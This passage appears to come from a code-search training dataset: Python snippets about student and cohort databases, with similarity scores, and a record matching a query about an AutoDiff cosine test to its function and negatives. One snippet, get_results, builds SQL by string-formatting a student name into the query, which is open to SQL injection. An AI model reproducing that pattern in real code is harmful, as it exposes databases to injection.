"def test_get_cohort(self):\r\n course = modulestore().get_course(self.toy_course_key)\r\n self.assertEqual(course.id, self.toy_course_key)\r\n self.assertFalse(course.is_cohorted)\r\n\r\n user = User.objects.create(username=\"test\", email=\"[email protected]\")\r\n other_user = User.objects.create(username=\"test2\", email=\"[email protected]\")\r\n\r\n self.assertIsNone(get_cohort(user, course.id), \"No cohort created yet\")\r\n\r\n cohort = CourseUserGroup.objects.create(name=\"TestCohort\",\r\n course_id=course.id,\r\n group_type=CourseUserGroup.COHORT)\r\n\r\n cohort.users.add(user)\r\n\r\n self.assertIsNone(get_cohort(user, course.id),\r\n \"Course isn't cohorted, so shouldn't have a cohort\")\r\n\r\n # Make the course cohorted...\r\n self.config_course_cohorts(course, [], cohorted=True)\r\n\r\n self.assertEquals(get_cohort(user, course.id).id, cohort.id,\r\n \"Should find the right cohort\")\r\n\r\n self.assertEquals(get_cohort(other_user, course.id), None,\r\n \"other_user shouldn't have a cohort\")",
"def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()",
"def school_names(request):\n names = models.SchoolDemographics.objects.order_by('name').distinct('name').values_list('name', flat=True)\n return Response(data=names)",
"def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()",
"def get_students(self):\n return u', '.join([c.student.username for c in self.candidates.all()])",
"def all_instructors(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(\n row[0], row[1], row[3], row[4]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.CohortId\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n for instrutor in all_instructors:\n print(instrutor)",
"def get_course_cohorts(course_key):\r\n return list(CourseUserGroup.objects.filter(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT\r\n ))",
"def test_cohort_list(self, client, user):\n assign_perm('release.view_releasecohort', user)\n client.force_login(user)\n url = reverse('cohort_list')\n response = client.get(url)\n\n assert response.status_code == 200",
"def create_cohort_list(cohorts):\n condensedCohorts = set()\n for coh in cohorts:\n condensedCohorts.add(coh.cid)\n\n structuredResponse = []\n for coh in condensedCohorts:\n new_dict = dict()\n new_dict['cohortId'] = coh.cid\n new_dict['paper'] = coh.paper\n new_dict['text'] = coh.text\n new_dict['email'] = coh.email\n structuredResponse.append(new_dict)\n return structuredResponse",
"def _cohorts(self):\n return ['parentsALL']",
"def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)",
"def test_cohort_data():\n app = bitool.app.test_client()\n resp = app.get(API_URL + cohort_data + no_chache, follow_redirects=True)\n assert (resp.status_code == 200)\n data = json.loads(resp.data)\n calculated_users = sum([x[1] for x in data['report']['data']])\n sum_users = data['sum']['data'][0][0]\n assert (calculated_users == sum_users)",
"def get_administerable_studies_by_name():\n researcher_admin = get_session_researcher()\n if researcher_admin.site_admin:\n studies = Study.get_all_studies_by_name()\n else:\n studies = researcher_admin.get_administered_studies_by_name()\n return studies",
"def test_cohort_detail(self, client, user, cohort):\n assign_perm('release.view_releasecohort', user)\n client.force_login(user)\n url = reverse('cohort_detail', kwargs={'cohort_id': cohort.id})\n response = client.get(url)\n\n assert response.status_code == 200",
"def get_student():\n\n github = request.args.get('github', 'jhacks')\n first, last, github = hackbright.get_student_by_github(github)\n\n\n rows = hackbright.list_projects(github)\n\n return render_template (\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows\n )",
"def get_cohort_by_id(course_key, cohort_id):\r\n return CourseUserGroup.objects.get(\r\n course_id=course_key,\r\n group_type=CourseUserGroup.COHORT,\r\n id=cohort_id\r\n )",
"def students(self):\n\t\treturn self.grade_set.all().distinct()",
"def get_all_students(hospital_codes, results_codes):\n data = pd.read_csv(\"res/Internship Lottery_April 8, 2018_11.54_correct encoding.csv\", encoding='iso-8859-8')\n students = []\n for i in range(2, 241):\n student = get_student(i + 2, data.iloc[i], hospital_codes, results_codes)\n if student is not None:\n students.append(student)\n\n return students",
"def get_students(self):\n dist_on_foot = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_foot')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Run, ActivityType.Walk])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n dist_on_bike = db.session.query(Activity.user_id.label('user_id'),\n func.sum(Activity.distance).label('on_bike')). \\\n filter(func.date(Activity.datetime) >= self.SEASON.start_date,\n func.date(Activity.datetime) <= self.SEASON.end_date,\n Activity.type.in_([ActivityType.Ride])). \\\n group_by(Activity.user_id). \\\n subquery(with_labels=True)\n data = db.session.query(User, dist_on_foot.c.on_foot, dist_on_bike.c.on_bike). \\\n select_from(User). \\\n outerjoin(dist_on_foot, User.id == dist_on_foot.c.user_id). \\\n outerjoin(dist_on_bike, User.id == dist_on_bike.c.user_id). \\\n filter(User.type == UserType.Student). \\\n order_by(User.last_name.asc(), User.first_name.asc())\n\n result = []\n for row in data:\n on_foot = row.on_foot or 0\n on_bike = row.on_bike or 0\n item = {\n 'name': row.User.first_name + ' ' + row.User.last_name,\n 'uk id': row.User.uk_id,\n 'on foot': round(on_foot, 1),\n 'on bike': round(on_bike, 1),\n 'points': round(on_foot + on_bike / 2, 2)\n }\n result.append(item)\n return result"
] |
[
"0.71378833",
"0.67550665",
"0.64338416",
"0.63730395",
"0.6308023",
"0.62971675",
"0.6139126",
"0.60914844",
"0.6068271",
"0.59822506",
"0.5776066",
"0.5736336",
"0.57326674",
"0.5610465",
"0.5608977",
"0.5501538",
"0.54608333",
"0.54211247",
"0.54135907",
"0.54071593",
"0.5391659",
"0.53636146",
"0.5330731",
"0.53210586",
"0.5290948",
"0.52627915",
"0.51972055",
"0.51875633",
"0.5167351",
"0.51581186"
] |
0.706303
|
1
|
Boolean condition asserts that value and derivative of cosine of the AutoDiff instance are equal to the expected value and derivative as calculated in the function for the case in which x is a real number. RETURNS ======== If the boolean condition returns True nothing is returned. If it is computed to be false, then an AssertionError is raised.
|
def test_cos_con():
c=14
assert {'diff':EF.cos(c).der, 'value': EF.cos(c).val}=={'diff':0, 'value': math.cos(c)}
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_arccos():\n c=0.5\n def myfunc(x):\n f1=EF.arccos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}\n assert res==expectAns",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_cos():\n c=14\n def myfunc(x):\n f1=EF.cos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n\n expectAns={'diff': -math.sin(c), 'value': math.cos(c)}\n\n assert res==expectAns",
"def test_cot():\n c=0.5\n\n def myfunc(x):\n f1=EF.cot(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}\n assert res==expectAns",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def test_cos_2ndord():\n # one variable\n x = fwd.Variable()\n f = fwd.cos(x)\n assert equals(f.derivative_at(x, {x: 1.0}, order=2), -np.cos(1.0))\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = fwd.cos(x*y)\n assert equals(g.derivative_at(x, {x:1.0, y: 2.0}, order=2), \n -2.0**2 * np.cos(2.0))\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)",
"def __eq__(self, value):\n return self.real != value",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def test_trig_functions(self):\r\n\r\n angles = ['-pi/4', '0', 'pi/6', 'pi/5', '5*pi/4', '9*pi/4', '1 + j']\r\n sin_values = [-0.707, 0, 0.5, 0.588, -0.707, 0.707, 1.298 + 0.635j]\r\n cos_values = [0.707, 1, 0.866, 0.809, -0.707, 0.707, 0.834 - 0.989j]\r\n tan_values = [-1, 0, 0.577, 0.727, 1, 1, 0.272 + 1.084j]\r\n # Cannot test tan(pi/2) b/c pi/2 is a float and not precise...\r\n\r\n self.assert_function_values('sin', angles, sin_values)\r\n self.assert_function_values('cos', angles, cos_values)\r\n self.assert_function_values('tan', angles, tan_values)\r\n\r\n # Include those where the real part is between -pi/2 and pi/2\r\n arcsin_inputs = ['-0.707', '0', '0.5', '0.588', '1.298 + 0.635*j']\r\n arcsin_angles = [-0.785, 0, 0.524, 0.629, 1 + 1j]\r\n self.assert_function_values('arcsin', arcsin_inputs, arcsin_angles)\r\n # Rather than a complex number, numpy.arcsin gives nan\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(1.1)')))\r\n\r\n # Include those where the real part is between 0 and pi\r\n arccos_inputs = ['1', '0.866', '0.809', '0.834-0.989*j']\r\n arccos_angles = [0, 0.524, 0.628, 1 + 1j]\r\n self.assert_function_values('arccos', arccos_inputs, arccos_angles)\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(1.1)')))\r\n\r\n # Has the same range as arcsin\r\n arctan_inputs = ['-1', '0', '0.577', '0.727', '0.272 + 1.084*j']\r\n arctan_angles = arcsin_angles\r\n self.assert_function_values('arctan', arctan_inputs, arctan_angles)",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def __ne__(self, value):\n return self.real == value",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def eq(a, b):\n return abs(a - b) < .05",
"def test_circumference():\n assert func1.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func1.circumference_circle(0) == 0, \"is 0\"\n assert func1.circumference_circle(10) == 2 * np.pi * 10",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_circumference():\n assert func_difficult.circumference_circle(1) == 2 * np.pi, \"returns pi *2\"\n assert func_difficult.circumference_circle(0) == 0, \"is 0\"\n assert func_difficult.circumference_circle(10) == 2 * np.pi * 10",
"def test_invalid_derivative_error(self):\r\n with pytest.raises(ValueError, match=\"n must be a positive integer\"):\r\n finite_diff_coeffs(0, 1, 1)\r\n\r\n with pytest.raises(ValueError, match=\"n must be a positive integer\"):\r\n finite_diff_coeffs(1.3, 1, 1)",
"def test_dixon_price(self):\n fun = get_problem('dixon_price', 2, -10, 10)\n solution = np.array([1.0, 0.70710678])\n self.assertAlmostEqual(fun(solution), 0.0)",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test_real(self):\n\n real = common_math.real\n\n self.assertTrue(real(3.75) + real(4.75) == real(8.5))\n self.assertTrue(real(2.5) * real(-1.5) == -real(3.75))\n\n pi_1 = to_real(real, Fraction(311, 99))\n pi_2 = to_real(real, Fraction(333, 106))\n pi_3 = to_real(real, Fraction(355, 113))\n\n self.assertTrue(pi_1 < pi_2)\n self.assertTrue(pi_2 < pi_3)",
"def is_cis(self):\n prev_res = self.get_offset_residue(-1)\n if prev_res is None:\n return None\n\n prev_omega = prev_res.calc_torsion_omega()\n if prev_omega is None:\n return None\n\n if abs(prev_omega) <= (math.pi/2.0):\n return True\n\n return False",
"def assert_true_iff(self, expression, predicate):\n\n if predicate:\n assert expression\n else:\n assert not expression",
"def __call__(self): # run test\n\n try: # Check if any errors were raised during calling of self.func\n return abs(self.func(*self.args, **self.kwargs) - self.res) < self._tolerance\n\n except IndexError:\n return False",
"def test_evaluate_is_of_expression(self):\n value = self.evaluate_common(\"isof(2D,'Edm.Double')\")\n self.assertTrue(\n value.type_code == edm.SimpleType.Boolean, \"Expected Boolean\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2M,'Edm.Double')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2,'Edm.Double')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(2.0D,'Edm.Single')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof('x','Edm.String')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(X'DEAD','Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof(false or true,'Edm.Boolean')\")\n self.assertTrue(value.value is True, \"Expected True\")\n value = self.evaluate_common(\"isof(null,'Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")\n value = self.evaluate_common(\"isof('Edm.String')\")\n self.assertTrue(value.value is False, \"Expected False\")",
"def test_check_result_with_expectation(self):\n pd_single = norm(0, 1)\n pd = [pd_single]\n meas = [-1]\n\n [meancrign, singlecrign] = crign.crign(pd, meas)\n\n # computation by hand\n # integrate from -inf to current measurement\n fixCdfL = lambda x: np.log(np.abs(pd_single.cdf(x) - 1))\n S1 = integrate.quad(fixCdfL, -np.inf, meas[0])\n\n # integrate from measurement to inf\n fixCdfU = lambda x: np.log(np.abs(pd_single.cdf(x) - 0))\n S2 = integrate.quad(fixCdfU, meas[0], np.inf)\n\n singlecrign2 = -(S1[0] + S2[0])\n assert_equal(meancrign, singlecrign2, msg=\"CRIGN values should be equal.\")",
"def double(self):\n if self.__valeur1 == self.__valeur2:\n return True\n else:\n return False",
"def test_divide_constant():\n x = fwd.Variable()\n assert equals((x/2.0).derivative_at(x,{x:3.0}), 0.5)\n assert equals((2.0/x).derivative_at(x,{x:3.0}), -2/9.0)",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result"
] |
[
"0.619214",
"0.61027396",
"0.60238",
"0.60212696",
"0.58170915",
"0.57943696",
"0.5740132",
"0.57104975",
"0.5706199",
"0.56809705",
"0.56070656",
"0.5600859",
"0.554108",
"0.5490728",
"0.545431",
"0.54504",
"0.5438208",
"0.5426342",
"0.54098964",
"0.54043466",
"0.5397096",
"0.5382717",
"0.53745",
"0.5352597",
"0.5343112",
"0.53100544",
"0.53008217",
"0.52898705",
"0.5276003",
"0.5263259"
] |
0.6238311
|
0
|
Boolean condition asserts that value and derivative of the cotangent of the AutoDiff instance are equal to the expected value and derivative as calculated in the function. RETURNS ======== If the boolean condition returns True nothing is returned. If it is computed to be false, then an AssertionError is raised.
|
def test_cot():
c=0.5
def myfunc(x):
f1=EF.cot(x)
return f1
f_obj=ADiff(myfunc)
res=f_obj.Jac(c)
expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}
assert res==expectAns
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def eq(a, b):\n return abs(a - b) < .05",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_dg_dT(self):\n dfn = lambda x: self.model.g(self.s, self.e, self.t, x)\n nderiv = differentiate(dfn, self.T)\n cderiv = self.model.dg_dT(self.s, self.e, self.t, self.T)\n if np.isclose(cderiv, 0.0):\n self.assertTrue(True) # This just means I don't care\n else:\n self.assertTrue(np.isclose(nderiv, cderiv))",
"def assert_almost_equal(self, val1, val2, delta):\n return self.assertTrue(\n 0 <= abs(val1 - val2) <= delta,\n \"Absolute difference of {} and {} ({}) is not within {}\".format(\n val1,\n val2,\n abs(val1-val2),\n delta,\n ),\n )",
"def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def is_almost_equal(self, x ,y ,epsilon=1*10**(-8)):\n \treturn abs(x-y) <= epsilon",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def __eq__(self, value):\n return self.real != value",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result",
"def _almost_coincident(a,b, rtol=RTOL, atol=ATOL):\n return (np.allclose(a, b, rtol=RTOL, atol=ATOL)\n or np.allclose(np.flipud(a),b, rtol=RTOL, atol=ATOL))",
"def test_value_change(self):\n before = self.data.diffusion_data[:, :, 0, 0]\n after = module_05.run_module(self.data).diffusion_data[:, :, 0, 0]\n self.assertFalse(np.all(before == after))",
"def consistent(self):\n if self.var1.get_value() is None or self.var2.get_value() is None:\n return True\n\n return self.var1.value != self.var2.value",
"def expected_value(expected, actual):\n assert expected == actual",
"def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)",
"def test_arccos():\n c=0.5\n def myfunc(x):\n f1=EF.arccos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}\n assert res==expectAns",
"def test_calculate_contract_fee(a, b, expected):\n assert calculate_contract_fee(a, b) == expected",
"def test_delta_val2(self):\n d = Delta(\"+2.5-1.5\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 3), False)\n self.assertEqual(d.cmp(3, 1), True)",
"def test_delta_val(self):\n d = Delta(\"+-3\")\n self.assertEqual(d.cmp(0, 1), False)\n self.assertEqual(d.cmp(1, 4), False)\n self.assertEqual(d.cmp(1, 5), True)",
"def satisfied(self):\n\n if self.var1.get_value() is None or self.var2.get_value() is None:\n return False\n\n return self.var1.get_value() != self.var2.get_value()",
"def test_dg_dt(self):\n dfn = lambda x: self.model.g(self.s, self.e, x, self.T)\n nderiv = differentiate(dfn, self.t)\n cderiv = self.model.dg_dt(self.s, self.e, self.t, self.T)\n self.assertTrue(np.isclose(nderiv, cderiv))",
"def _almost_equal(x, y):\n pass",
"def equals_exact(self, other, tolerance): # -> bool:\n ...",
"def almost_equals(self, other, decimal=...): # -> bool:\n ..."
] |
[
"0.58552843",
"0.5829446",
"0.5812231",
"0.5791843",
"0.57855046",
"0.57324314",
"0.5686355",
"0.56789756",
"0.5673521",
"0.5671666",
"0.56386083",
"0.56118995",
"0.56100917",
"0.5604398",
"0.55884665",
"0.5584099",
"0.5578517",
"0.5570114",
"0.5569593",
"0.5566972",
"0.5565048",
"0.55641246",
"0.55276966",
"0.54679626",
"0.5465824",
"0.54650784",
"0.5460181",
"0.5416084",
"0.5413459",
"0.54118943"
] |
0.5946147
|
0
|
Boolean condition asserts that the value and derivative of the inverse cosine of the AutoDiff instance are equal to the expected value and derivative as calculated in the function. Returns: if the boolean condition is True, nothing is returned; if it is computed to be False, then an AssertionError is raised.
|
def test_arccos():
    c=0.5
    def myfunc(x):
        f1=EF.arccos(x)
        return f1
    f_obj=ADiff(myfunc)
    res=f_obj.Jac(c)
    expectAns={'diff':-1/math.sqrt(1-c**2), 'value':math.acos(c)}
    assert res==expectAns
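For reference, the expected 'diff' above is the standard inverse-cosine derivative (background calculus, not derived in the source):
\[ \frac{d}{dx}\arccos x = -\frac{1}{\sqrt{1 - x^{2}}} . \]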
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_eq():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.sin(x) + fwd.cos(y)\n g = fwd.sin(x) + fwd.cos(y)\n h = fwd.sin(y) + fwd.cos(x)\n assert f == g\n assert f != h",
"def test_cos_con():\n c=14\n assert {'diff':EF.cos(c).der, 'value': EF.cos(c).val}=={'diff':0, 'value': math.cos(c)}",
"def test_cos():\n c=14\n def myfunc(x):\n f1=EF.cos(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n\n expectAns={'diff': -math.sin(c), 'value': math.cos(c)}\n\n assert res==expectAns",
"def checkFloat(comment, value, expected, tol=1e-10, update=True):\n if np.isnan(value) and np.isnan(expected):\n res = True\n elif np.isnan(value) or np.isnan(expected):\n res = False\n else:\n res = abs(value - expected) <= tol\n if update:\n if not res:\n print(\"checking float\",comment,'|',value,\"!=\",expected)\n results[\"fail\"] += 1\n else:\n results[\"pass\"] += 1\n return res",
"def test_cot():\n c=0.5\n\n def myfunc(x):\n f1=EF.cot(x)\n return f1\n\n f_obj=ADiff(myfunc)\n res=f_obj.Jac(c)\n expectAns={'diff':2/(math.cos(c*2)-1), 'value':math.cos(c)/math.sin(c)}\n assert res==expectAns",
"def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12",
"def eq(a, b):\n return abs(a - b) < .05",
"def test_diferencia_porcentual_igual(self):\r\n valorNuevo = 10\r\n valorAnterior = 10\r\n self.assertEqual(diferenciaPorcentual(valorNuevo, valorAnterior), 0)",
"def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1",
"def test_comp_angle_wind_eq(self, test_dict):\n test_obj = test_dict[\"test_obj\"]\n result = test_obj.slot.comp_angle_wind_eq()\n\n a = result\n b = test_dict[\"Aw\"]\n msg = \"Return \" + str(a) + \" expected \" + str(b)\n self.assertAlmostEqual((a - b) / a, 0, delta=DELTA, msg=msg)",
"def test_cos_2ndord():\n # one variable\n x = fwd.Variable()\n f = fwd.cos(x)\n assert equals(f.derivative_at(x, {x: 1.0}, order=2), -np.cos(1.0))\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = fwd.cos(x*y)\n assert equals(g.derivative_at(x, {x:1.0, y: 2.0}, order=2), \n -2.0**2 * np.cos(2.0))\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)",
"def assert_true_iff(self, expression, predicate):\n\n if predicate:\n assert expression\n else:\n assert not expression",
"def expected_value_test_3(self):\n\n c = 10\n fun = self.x_ev.add(c)\n\n res_x_c = self.X_dist.expectedValue(self.x_ev) + c\n res_xc = self.X_dist.expectedValue(fun)\n assert_almost_equal(res_x_c, res_xc)",
"def not_equals_success_func(target, result):\n if result is None:\n return False\n return target != result",
"def __eq__(self, value):\n return self.real != value",
"def test_potential_differences(self):\n t, x_n, x_p = self.t, self.x_n, self.x_p\n\n np.testing.assert_array_almost_equal(\n self.phi_s_n(t, x_n) - self.phi_e_n(t, x_n), self.delta_phi_n(t, x_n)\n )\n np.testing.assert_array_almost_equal(\n self.phi_s_p(t, x_p) - self.phi_e_p(t, x_p),\n self.delta_phi_p(t, x_p),\n decimal=5,\n )",
"def test_eq():\n\n def myfunc1(x,y):\n f1=1*x*y*2\n return f1\n\n def myfunc2(x,y):\n f1=1*x*y*4\n return f1\n\n f_obj1=ADiff(myfunc1)\n res1 = f_obj1 == f_obj1\n f_obj2=ADiff(myfunc2)\n res2 = f_obj1 == f_obj2\n\n assert res1==True and res2==False",
"def deviation_ok(norm, value, epsilon):\n deviation = abs(norm-value)/norm\n # print(abs(d-epsilon))\n return deviation <= epsilon",
"def __ne__(self, value):\n return self.real == value",
"def test_trig_functions(self):\r\n\r\n angles = ['-pi/4', '0', 'pi/6', 'pi/5', '5*pi/4', '9*pi/4', '1 + j']\r\n sin_values = [-0.707, 0, 0.5, 0.588, -0.707, 0.707, 1.298 + 0.635j]\r\n cos_values = [0.707, 1, 0.866, 0.809, -0.707, 0.707, 0.834 - 0.989j]\r\n tan_values = [-1, 0, 0.577, 0.727, 1, 1, 0.272 + 1.084j]\r\n # Cannot test tan(pi/2) b/c pi/2 is a float and not precise...\r\n\r\n self.assert_function_values('sin', angles, sin_values)\r\n self.assert_function_values('cos', angles, cos_values)\r\n self.assert_function_values('tan', angles, tan_values)\r\n\r\n # Include those where the real part is between -pi/2 and pi/2\r\n arcsin_inputs = ['-0.707', '0', '0.5', '0.588', '1.298 + 0.635*j']\r\n arcsin_angles = [-0.785, 0, 0.524, 0.629, 1 + 1j]\r\n self.assert_function_values('arcsin', arcsin_inputs, arcsin_angles)\r\n # Rather than a complex number, numpy.arcsin gives nan\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arcsin(1.1)')))\r\n\r\n # Include those where the real part is between 0 and pi\r\n arccos_inputs = ['1', '0.866', '0.809', '0.834-0.989*j']\r\n arccos_angles = [0, 0.524, 0.628, 1 + 1j]\r\n self.assert_function_values('arccos', arccos_inputs, arccos_angles)\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(-1.1)')))\r\n self.assertTrue(numpy.isnan(calc.evaluator({}, {}, 'arccos(1.1)')))\r\n\r\n # Has the same range as arcsin\r\n arctan_inputs = ['-1', '0', '0.577', '0.727', '0.272 + 1.084*j']\r\n arctan_angles = arcsin_angles\r\n self.assert_function_values('arctan', arctan_inputs, arctan_angles)",
"def expected_value(expected, actual):\n assert expected == actual",
